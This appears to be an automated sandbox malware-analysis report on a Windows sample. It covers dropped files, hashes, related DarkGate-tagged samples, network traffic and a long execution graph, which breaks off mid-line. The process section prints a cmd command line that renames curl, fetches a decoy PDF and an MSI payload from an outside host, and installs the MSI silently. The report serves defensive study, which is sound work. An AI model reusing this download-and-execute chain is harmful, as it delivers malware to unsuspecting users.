    https://curl.se/docs/hsts.htmlTNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drfalse
      		unknown
      https://curl.se/docs/copyright.htmlDTNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drfalse
        		unknown
        https://curl.se/libcurl/c/curl_easy_setopt.htmlTNheBOJElq.exe.0.drfalse
          		unknown
          https://curl.se/PTNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drfalse
            		unknown
            https://curl.se/docs/http-cookies.html#TNheBOJElq.exefalse
              		unknown
              https://curl.se/docs/http-cookies.htmlTNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drfalse
                		unknown
                https://curl.se/docs/hsts.html#TNheBOJElq.exefalse
                  		unknown
                  https://curl.se/docs/sslcerts.htmlTNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drfalse
                    		unknown
                    https://curl.se/docs/sslcerts.htmlcurlTNheBOJElq.exefalse
                      		unknown

                      World Map of Contacted IPs

                      No contacted IP infos

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1528042
                      Start date and time:2024-10-07 14:41:17 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 4m 33s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowscmdlinecookbook.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:12
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:CLEAN
                      Classification:clean8.win@11/3@1/0
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 98%
                      • Number of executed functions: 25
                      • Number of non-executed functions: 282

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe8SdvyePo6j.docmGet hashmaliciousUnknownBrowse
                        New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmGet hashmaliciousUnknownBrowse
                          https://rocksecuritymw.com/mus/?81367511Get hashmaliciousDarkGateBrowse
                            https://taskbes.com/ttse/?75486511Get hashmaliciousDarkGateBrowse
                              https://ledscreen.africa/dcil/?77391211Get hashmaliciousDarkGateBrowse
                                m7q7gcniEz.exeGet hashmaliciousUnknownBrowse

                                  Created / dropped Files

                                  C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe

                                  Download File
                                  Process:C:\Windows\SysWOW64\cmd.exe
                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):470528
                                  Entropy (8bit):6.743680599799538
                                  Encrypted:false
                                  SSDEEP:12288:sUE03qxFqJC1cwgysc/2gIsJFBhlyAjoSYgq:sUE06qCSwgbW2gpD3sAkSYgq
                                  MD5:44E5BAEEE864F1E9EDBE3986246AB37A
                                  SHA1:6EDAE73E36B61B261369717EA3657A6783EBA872
                                  SHA-256:4BCA545DD0DEAC696838C6338BA66A934426A34CE43D136D2750436F31E6BAFB
                                  SHA-512:DC39C1E4F59FCAC4A0A6D6B0AD890F351B5D6655B3173950B8EB4A03419311D0020D86F4868A001DF5CE270DE570B86C4F8AB86473F65E678C5A3493949305EA
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: 8SdvyePo6j.docm, Detection: malicious, Browse
                                  • Filename: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm, Detection: malicious, Browse
                                  • Filename: , Detection: malicious, Browse
                                  • Filename: , Detection: malicious, Browse
                                  • Filename: , Detection: malicious, Browse
                                  • Filename: m7q7gcniEz.exe, Detection: malicious, Browse
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m.z...)...)...).cP)...).y.(...).y.(...).y.(...).t>)...).n.(...)...)=..).y.(I..).yR)...).y.(...)Rich...)........................PE..L.....~b.................4..........p........P....@..........................p............@.................................\...4.......@.......................@Q..X...T...............................@............P...............................text...i3.......4.................. ..`.rdata..J....P.......8..............@..@.data...............................@....rsrc...@...........................@..@.reloc..@Q.......R..................@..B........................................................................................................................................................................................................................................................................................................

                                  \Device\ConDrv

                                  Download File
                                  Process:C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
                                  File Type:ASCII text, with CR, LF line terminators
                                  Category:dropped
                                  Size (bytes):65
                                  Entropy (8bit):4.321712528700369
                                  Encrypted:false
                                  SSDEEP:3:3JtNVFXFd8wTiAA6tNxCHxo:3JtNvXFGN56t7CRo
                                  MD5:DA85F2BE49ADA4247D5F608DEBE3F48F
                                  SHA1:97797305121C74B624F9BD19AF3A113E34980CBA
                                  SHA-256:4F3720C8F1696E0C61A3969921E08E4910BA6CFEFFF60EFC3E5F020916D6551C
                                  SHA-512:F4A058D2572EEE922F06376F0A92D7331A8BE1E3C3E3531E2ECC1D989B1243E7A41669D7AC17B3480CB3136882BAD60FB5A567E3D173B13767AAC068F911C02B
                                  Malicious:false
                                  Reputation:low
                                  Preview:curl: (1) Protocol "hxxps" not supported or disabled in libcurl..

                                  Static File Info

                                  No static file info

                                  Network Behavior

                                  Network Port Distribution

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 7, 2024 14:42:39.188973904 CEST5360800162.159.36.2192.168.2.4
                                  Oct 7, 2024 14:42:39.640908957 CEST6244553192.168.2.41.1.1.1
                                  Oct 7, 2024 14:42:39.648832083 CEST53624451.1.1.1192.168.2.4

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Oct 7, 2024 14:42:39.640908957 CEST192.168.2.41.1.1.10x8721Standard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Oct 7, 2024 14:42:39.648832083 CEST1.1.1.1192.168.2.40x8721Name error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:08:42:03
                                  Start date:07/10/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
                                  Imagebase:0x240000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:1
                                  Start time:08:42:03
                                  Start date:07/10/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:08:42:03
                                  Start date:07/10/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /c cd /d "C:\"
                                  Imagebase:0x240000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:08:42:03
                                  Start date:07/10/2024
                                  Path:C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
                                  Wow64 process (32bit):true
                                  Commandline:TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf
                                  Imagebase:0xe00000
                                  File size:470'528 bytes
                                  MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 0%, ReversingLabs
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:08:42:04
                                  Start date:07/10/2024
                                  Path:C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
                                  Wow64 process (32bit):true
                                  Commandline:TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent
                                  Imagebase:0xe00000
                                  File size:470'528 bytes
                                  MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:5
                                  Start time:08:42:04
                                  Start date:07/10/2024
                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
                                  Imagebase:0x850000
                                  File size:59'904 bytes
                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:6
                                  Start time:08:42:04
                                  Start date:07/10/2024
                                  Path:C:\Windows\System32\msiexec.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                  Imagebase:0x7ff67f4b0000
                                  File size:69'632 bytes
                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:1.8%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:3.8%
                                    Total number of Nodes:837
                                    Total number of Limit Nodes:26
                                    execution_graph 41742 e1d0e3 41 API calls 41743 e398e0 93 API calls 41744 e314e0 198 API calls 41745 e4bce7 36 API calls _ValidateLocalCookies 41749 e35cf0 6 API calls _ValidateLocalCookies 41896 e35ef0 21 API calls 41752 e1d8c0 29 API calls _ValidateLocalCookies 41899 e1bec2 76 API calls 41754 e430c0 28 API calls ___from_strstr_to_strchr 41755 e100c4 29 API calls _ValidateLocalCookies 41902 e0aacc 74 API calls _ValidateLocalCookies 41757 e17bff 600 API calls 41761 e404d0 free _close 41905 e516d0 14 API calls 41762 e0544b 21 API calls _ValidateLocalCookies 41911 e1aa59 __acrt_iob_func 41912 e43ea4 71 API calls _ValidateLocalCookies 41913 e3cea1 28 API calls 41766 e370a0 39 API calls 41915 e45aa0 160 API calls _ValidateLocalCookies 41916 e4caa0 11 API calls ___from_strstr_to_strchr 41918 e02aa8 21 API calls ___from_strstr_to_strchr 41768 e09caa 31 API calls _ValidateLocalCookies 41920 e0544b 24 API calls _ValidateLocalCookies 41769 e0544b 32 API calls _ValidateLocalCookies 41770 e0bcad 73 API calls _ValidateLocalCookies 41921 e38ab0 78 API calls 41922 e316b0 24 API calls 41771 e0544b 22 API calls _ValidateLocalCookies 41924 e286b7 10 API calls 41925 e1aa5b 17 API calls 41772 e17bff 197 API calls 41773 e3d08b 49 API calls 41775 e22490 27 API calls 41777 e06493 strtod 41927 e36a90 83 API calls 41928 e39a90 28 API calls 41929 e0f29f 68 API calls 41780 e3d060 451 API calls 41781 e34c60 19 API calls 41932 e38660 20 API calls 41933 e46660 7 API calls 41935 e0544b 32 API calls _ValidateLocalCookies 41553 e0ca6a 41554 e0ca75 41553->41554 41555 e0ca85 41553->41555 41556 e0ca7a 41554->41556 41566 e0ca8f 41554->41566 41597 e09199 20 API calls 41556->41597 41558 e0cb58 41558->41555 41600 e09b4c 7 API calls 41558->41600 41563 e09327 330 API calls 41563->41566 41564 e0caf1 Sleep 41564->41566 41566->41558 41566->41563 41566->41564 41567 e0923b 41566->41567 41581 e122be 41566->41581 41598 e0336a 6 API calls 41566->41598 41599 e0920d free 41566->41599 41570 e0925e 41567->41570 41578 e092cc 41567->41578 41568 e50ca6 _ValidateLocalCookies 5 API calls 41569 e092e9 41568->41569 41569->41566 41570->41578 41601 e10b16 _open 41570->41601 41572 e09273 41573 e092eb 41572->41573 41574 e0927d _fstat64 41572->41574 41603 e09159 15 API calls 41573->41603 41574->41573 41576 e0928e 41574->41576 41576->41578 41602 e0f352 61 API calls _ValidateLocalCookies 41576->41602 41577 e092fe 41577->41578 41579 e09307 _close __acrt_iob_func _fileno 41577->41579 41578->41568 41579->41578 41582 e122cb 41581->41582 41586 e122c7 41581->41586 41583 e122ef 41582->41583 41584 e122de 41582->41584 41587 e16ba2 67 API calls 41583->41587 41588 e12301 41583->41588 41615 e1d6ad 17 API calls _ValidateLocalCookies 41584->41615 41586->41566 41587->41588 41588->41586 41604 e16da2 41588->41604 41590 e12331 41591 e12339 41590->41591 41592 e1234e 41590->41592 41593 e18b08 266 API calls 41591->41593 41610 e12261 41592->41610 41593->41586 41597->41555 41598->41566 41599->41566 41600->41555 41601->41572 41602->41578 41603->41577 41605 e16db1 41604->41605 41609 e16dd8 41604->41609 41605->41609 41617 e1941d 19 API calls 2 library calls 41605->41617 41607 e16e3b 41618 e1927c 7 API calls 41607->41618 41609->41590 41614 e1226c 41610->41614 41611 e1760d 35 API calls 41611->41614 41612 e122a9 41616 e17276 108 API calls 41612->41616 41613 e18a2b 102 API calls 41613->41614 41614->41611 41614->41612 41614->41613 41615->41586 41616->41586 41617->41607 41618->41609 41783 e3d06e 653 API calls 41784 e0544b 53 API calls 2 library calls 41687 e0a06f fopen 41688 e0a0a7 41687->41688 41689 e0a087 41687->41689 41726 e0d323 41688->41726 41689->41688 41690 e0a08f 41689->41690 41735 e09199 20 API calls 41690->41735 41693 e0a0b1 41694 e0a0c7 free 41693->41694 41695 e0a0db 41693->41695 41694->41695 41697 e0a103 41695->41697 41698 e0a0ed 41695->41698 41696 e0a030 41699 e0a1a0 41696->41699 41740 e09b4c 7 API calls 41696->41740 41703 e0d8d0 2 API calls 41697->41703 41701 e0a0f1 fclose 41698->41701 41702 e0a02a 41698->41702 41704 e50ca6 _ValidateLocalCookies 5 API calls 41699->41704 41701->41702 41734 e09199 20 API calls 41702->41734 41705 e0a110 free 41703->41705 41706 e0c5d1 41704->41706 41708 e0a122 fclose 41705->41708 41710 e0a12a 41705->41710 41708->41710 41709 e0a158 41712 e12235 60 API calls 41709->41712 41710->41696 41710->41709 41711 e0a15a fopen 41710->41711 41713 e0a151 41710->41713 41711->41709 41714 e0a172 41711->41714 41715 e0a1c1 41712->41715 41736 e01018 _fileno _setmode 41713->41736 41737 e0913e 20 API calls 41714->41737 41739 e091ba calloc 41715->41739 41718 e0a17e free 41738 e0fea5 free free free free 41718->41738 41720 e0a1d6 41722 e216ca 266 API calls 41720->41722 41723 e0a1e8 41722->41723 41723->41696 41724 e0c598 fclose 41723->41724 41725 e0c5a4 41724->41725 41725->41696 41727 e0d3ec 41726->41727 41728 e0d363 fgets 41726->41728 41729 e50ca6 _ValidateLocalCookies 5 API calls 41727->41729 41728->41727 41731 e0d37d ___from_strstr_to_strchr 41728->41731 41730 e0d403 41729->41730 41730->41693 41731->41727 41733 e0d3d2 fgets 41731->41733 41741 e10ca0 free realloc free 41731->41741 41733->41727 41733->41731 41734->41696 41735->41696 41736->41709 41737->41718 41738->41699 41739->41720 41740->41699 41741->41731 41786 e01070 34 API calls _ValidateLocalCookies 41787 e13070 fclose free 41937 e34a70 free free 41938 e3fa70 69 API calls _ValidateLocalCookies 41790 e3d07c 50 API calls 41791 e1bc7e free malloc 40829 e0ce40 _strdup 40830 e0ce52 setlocale 40829->40830 40831 e0ce69 40830->40831 40836 e0ce82 40830->40836 40832 e0ce6d strncmp 40831->40832 40833 e0cecb 40831->40833 40832->40836 40837 e0cebf free 40832->40837 40881 e08599 28 API calls 40833->40881 40836->40837 40852 e0dc15 40836->40852 40841 e0cec7 40837->40841 40839 e0ceda 40843 e0cef5 40839->40843 40844 e0cee6 40839->40844 40840 e0ceb6 40840->40837 40840->40841 40841->40833 40842 e0ceee 40841->40842 40843->40842 40847 e0cf06 40843->40847 40848 e0ceff 40843->40848 40882 e089a1 19 API calls 40844->40882 40850 e0cf04 40847->40850 40884 e08b82 313 API calls 40847->40884 40883 e08a54 18 API calls _ValidateLocalCookies 40848->40883 40850->40842 40853 e0dcb0 40852->40853 40854 e0dc3f 40852->40854 40856 e0dcc6 fopen 40853->40856 40858 e0dcbd __acrt_iob_func 40853->40858 40885 e0375a 40854->40885 40878 e0dc7a 40856->40878 40858->40878 40859 e0dc81 40899 e0db81 16 API calls _strrchr 40859->40899 40860 e0dc57 fopen 40861 e0dc6b free 40860->40861 40860->40878 40864 e0ce9b 40861->40864 40864->40840 40880 e09159 15 API calls 40864->40880 40866 e0dc8b 40877 e0dc9e 40866->40877 40900 e0db81 16 API calls _strrchr 40866->40900 40867 e0e047 40898 e10c88 free 40867->40898 40870 e0e056 __acrt_iob_func 40871 e0e063 fclose 40870->40871 40872 e0e06b free 40870->40872 40871->40872 40872->40864 40873 e0de14 malloc 40873->40867 40873->40877 40875 e0e02b free 40875->40878 40876 e0df79 malloc 40876->40877 40877->40872 40877->40878 40878->40867 40878->40872 40878->40873 40878->40875 40878->40876 40879 e0913e 20 API calls 40878->40879 40891 e0e08f 40878->40891 40901 e052d9 21 API calls _ValidateLocalCookies 40878->40901 40879->40878 40880->40840 40881->40839 40882->40842 40883->40850 40884->40850 40886 e03846 40885->40886 40890 e03775 40885->40890 40886->40859 40886->40860 40888 e12920 free 40888->40890 40890->40886 40890->40888 40902 e12677 40890->40902 40909 e036ba 40890->40909 40897 e0e09c ___from_strstr_to_strchr 40891->40897 40892 e0e0b3 fgets 40893 e0e106 40892->40893 40892->40897 40919 e50ca6 40893->40919 40895 e0e125 40895->40878 40897->40892 40897->40893 40926 e10ca0 free realloc free 40897->40926 40898->40870 40899->40866 40900->40877 40901->40878 40907 e126a4 40902->40907 40903 e126c4 realloc 40904 e1268e GetEnvironmentVariableA 40903->40904 40905 e126ce free 40903->40905 40904->40905 40904->40907 40908 e126e4 40905->40908 40907->40903 40907->40905 40907->40908 40908->40890 40912 e036dc 40909->40912 40911 e0374e 40911->40890 40912->40911 40913 e03737 _strdup _close 40912->40913 40916 e10b16 _open 40912->40916 40917 e12920 free 40912->40917 40918 e12920 free 40913->40918 40916->40912 40917->40912 40918->40911 40920 e50caf IsProcessorFeaturePresent 40919->40920 40921 e50cae 40919->40921 40923 e50cf1 40920->40923 40921->40895 40927 e50cb4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 40923->40927 40925 e50dd4 40925->40895 40926->40897 40927->40925 41792 e12040 free realloc free 41793 e42440 40 API calls 41939 e51e40 6 API calls 4 library calls 41941 e17bff 102 API calls 41799 e37050 51 API calls 41943 e38a50 70 API calls 41944 e0544b 25 API calls _ValidateLocalCookies 41801 e0544b 22 API calls _ValidateLocalCookies 41802 e0d05c 314 API calls _strrchr 41803 e13020 fopen fseek 41804 e3d022 442 API calls 41805 e27c20 GetEnvironmentVariableA realloc free free 41947 e28a20 31 API calls _ValidateLocalCookies 41806 e38420 free free free 41950 e0a227 266 API calls 41951 e2db05 298 API calls _ValidateLocalCookies 41809 e3ca59 22 API calls 41810 e1aa5b 11 API calls 41952 e02230 57 API calls _ValidateLocalCookies 41812 e34c30 20 API calls 41953 e41e30 88 API calls 41956 e3d200 47 API calls 41957 e36e00 30 API calls 41815 e42400 54 API calls 41816 e46400 CryptAcquireContextA CryptGenRandom CryptReleaseContext 41818 e4bc02 43 API calls _ValidateLocalCookies 41539 e01e09 41540 e01e29 41539->41540 41541 e12677 3 API calls 41540->41541 41542 e01e49 41541->41542 41543 e01e93 41542->41543 41544 e01e4f strtol 41542->41544 41545 e01e9b GetStdHandle 41543->41545 41548 e01eb7 41543->41548 41550 e01e66 41544->41550 41547 e01ea8 GetConsoleScreenBufferInfo 41545->41547 41545->41548 41547->41548 41549 e50ca6 _ValidateLocalCookies 5 API calls 41548->41549 41551 e01f0b 41549->41551 41552 e12920 free 41550->41552 41552->41543 41820 e3d013 23 API calls 41961 e37210 calloc calloc 40822 e031e0 40823 e031e9 40822->40823 40824 e031f4 40823->40824 40826 e031c0 40823->40826 40827 e031cd SetConsoleMode 40826->40827 40828 e031df 40826->40828 40827->40828 40828->40824 41824 e169e0 7 API calls 41963 e103e0 19 API calls 41964 e12fe0 fopen fread 41965 e3dfe0 38 API calls 41966 e0544b 34 API calls _ValidateLocalCookies 41825 e17bff 450 API calls 41501 e511e2 41502 e511ee ___scrt_is_nonwritable_in_current_image 41501->41502 41525 e50f27 41502->41525 41504 e511f5 41505 e5134e 41504->41505 41508 e5121f 41504->41508 41535 e5155b IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 41505->41535 41507 e51355 exit 41509 e5135b _exit 41507->41509 41510 e51223 _initterm_e 41508->41510 41515 e5126c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 41508->41515 41511 e5124f _initterm 41510->41511 41512 e5123e 41510->41512 41511->41515 41513 e512c0 _get_initial_narrow_environment __p___argv __p___argc 41514 e08f6e 41513->41514 41516 e512dc 41514->41516 41515->41513 41518 e512b8 _register_thread_local_exe_atexit_callback 41515->41518 41533 e5167b GetModuleHandleW 41516->41533 41518->41513 41519 e512e6 41519->41507 41520 e512ea 41519->41520 41521 e512f3 41520->41521 41522 e512ee _cexit 41520->41522 41534 e51099 8 API calls ___scrt_uninitialize_crt 41521->41534 41522->41521 41524 e512fc 41524->41512 41526 e50f30 41525->41526 41536 e5137a IsProcessorFeaturePresent 41526->41536 41528 e50f3c 41537 e51dbb 11 API calls 2 library calls 41528->41537 41530 e50f41 ___scrt_uninitialize_crt 41532 e50f45 41530->41532 41538 e51dda 8 API calls 2 library calls 41530->41538 41532->41504 41533->41519 41534->41524 41535->41507 41536->41528 41537->41530 41538->41532 41968 e07beb 24 API calls ___from_strstr_to_strchr 41969 e17bff 193 API calls 41826 e1bded 17 API calls 41971 e457f0 42 API calls _ValidateLocalCookies 41974 e3cff6 33 API calls 41976 e427fa strncmp 41977 e0544b 22 API calls _ValidateLocalCookies 41831 e09d51 134 API calls _ValidateLocalCookies 41832 e0a5c4 25 API calls 41978 e463c0 26 API calls 41979 e03bd0 __acrt_iob_func fseek 41980 e2db05 41 API calls _ValidateLocalCookies 41837 e4bdd5 16 API calls _ValidateLocalCookies 41838 e0544b 24 API calls _ValidateLocalCookies 41981 e45fd0 158 API calls 41839 e511d0 _set_new_mode SetUnhandledExceptionFilter 41983 e39ba0 33 API calls 41843 e451a0 49 API calls 41984 e4bfa1 QueryPerformanceCounter GetTickCount 41844 e4bd8e 33 API calls _ValidateLocalCookies 41623 e0cbae 41624 e0cc43 41623->41624 41625 e0cbcd 41623->41625 41625->41624 41651 e12235 41625->41651 41627 e0cbde 41627->41624 41628 e0cc91 41627->41628 41629 e12677 3 API calls 41627->41629 41628->41624 41630 e216ca 266 API calls 41628->41630 41631 e0cc16 41629->41631 41630->41624 41632 e0cc1c _strdup 41631->41632 41635 e12677 3 API calls 41631->41635 41633 e0cc87 41632->41633 41634 e0cc2d 41632->41634 41661 e12920 free 41633->41661 41657 e12920 free 41634->41657 41638 e0cc56 41635->41638 41640 e0cc93 41638->41640 41641 e0cc5c _strdup 41638->41641 41639 e0cc33 41658 e09199 20 API calls 41639->41658 41644 e12677 3 API calls 41640->41644 41641->41633 41642 e0cc6d 41641->41642 41659 e12920 free 41642->41659 41646 e0cc9d 41644->41646 41646->41632 41648 e0cca7 41646->41648 41647 e0cc73 41660 e09159 15 API calls 41647->41660 41662 e0305c 10 API calls _ValidateLocalCookies 41648->41662 41652 e12243 41651->41652 41653 e12248 41651->41653 41655 e12135 31 API calls 41652->41655 41656 e12254 41653->41656 41663 e21cdf calloc 41653->41663 41655->41653 41656->41627 41657->41639 41658->41624 41659->41647 41660->41624 41661->41628 41662->41628 41664 e21cfe calloc 41663->41664 41665 e21d10 calloc 41664->41665 41666 e21d08 41664->41666 41667 e21d28 calloc 41665->41667 41666->41656 41668 e21d36 free 41667->41668 41669 e21d4a 41667->41669 41668->41666 41683 e21aee 8 API calls 41669->41683 41672 e21d52 41673 e21d98 free 41672->41673 41674 e21d5f 41672->41674 41685 e1d126 free 41673->41685 41684 e27f41 6 API calls 41674->41684 41676 e21d75 41676->41666 41679 e21db6 41686 e214fa 9 API calls 41679->41686 41681 e21dbd free 41681->41676 41683->41672 41684->41676 41685->41679 41686->41681 41987 e01fb0 _lseeki64 41988 e17bff 265 API calls 41993 e09bbc 97 API calls 41849 e01580 51 API calls 41850 e3ca57 25 API calls 41996 e30380 19 API calls 41997 e3df80 660 API calls 41999 e46380 46 API calls 42001 e12f90 free 41023 e08f92 _mbscmp 41024 e08fa6 41023->41024 41025 e08fd8 41023->41025 41081 e0310d 14 API calls _ValidateLocalCookies 41024->41081 41041 e10b38 41025->41041 41029 e08fab 41031 e08fc8 41029->41031 41082 e120f5 15 API calls 41029->41082 41083 e10e10 free free 41031->41083 41036 e08fcf 41037 e09035 41036->41037 41038 e0902a fflush 41038->41037 41039 e0900b 41039->41038 41069 e08eec 41039->41069 41042 e10b63 GetModuleHandleA GetProcAddress 41041->41042 41043 e10b85 41041->41043 41042->41043 41044 e10be2 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask 41043->41044 41045 e10ba0 41043->41045 41046 e10c56 RtlVerifyVersionInfo 41044->41046 41047 e10c68 VerifyVersionInfoW 41044->41047 41048 e50ca6 _ValidateLocalCookies 5 API calls 41045->41048 41046->41045 41047->41045 41050 e08fe6 QueryPerformanceFrequency 41048->41050 41051 e031fa GetStdHandle 41050->41051 41052 e0320c GetConsoleMode 41051->41052 41056 e03266 41051->41056 41053 e0321c 41052->41053 41052->41056 41054 e03225 SetConsoleCtrlHandler 41053->41054 41053->41056 41055 e03243 SetConsoleMode 41054->41055 41054->41056 41057 e03269 SetConsoleCtrlHandler 41055->41057 41058 e0325c 41055->41058 41060 e08e58 __acrt_iob_func malloc 41056->41060 41057->41056 41084 e510ee _crt_atexit _register_onexit_function 41058->41084 41061 e08e90 41060->41061 41062 e08ed9 41060->41062 41085 e12135 41061->41085 41091 e09199 20 API calls 41062->41091 41065 e08e95 41067 e08ea6 41065->41067 41090 e09199 20 API calls 41065->41090 41067->41039 41068 e08ecb free 41068->41067 41134 e121c0 41069->41134 41072 e08f1a 41074 e08f32 free 41072->41074 41076 e08f28 fclose 41072->41076 41073 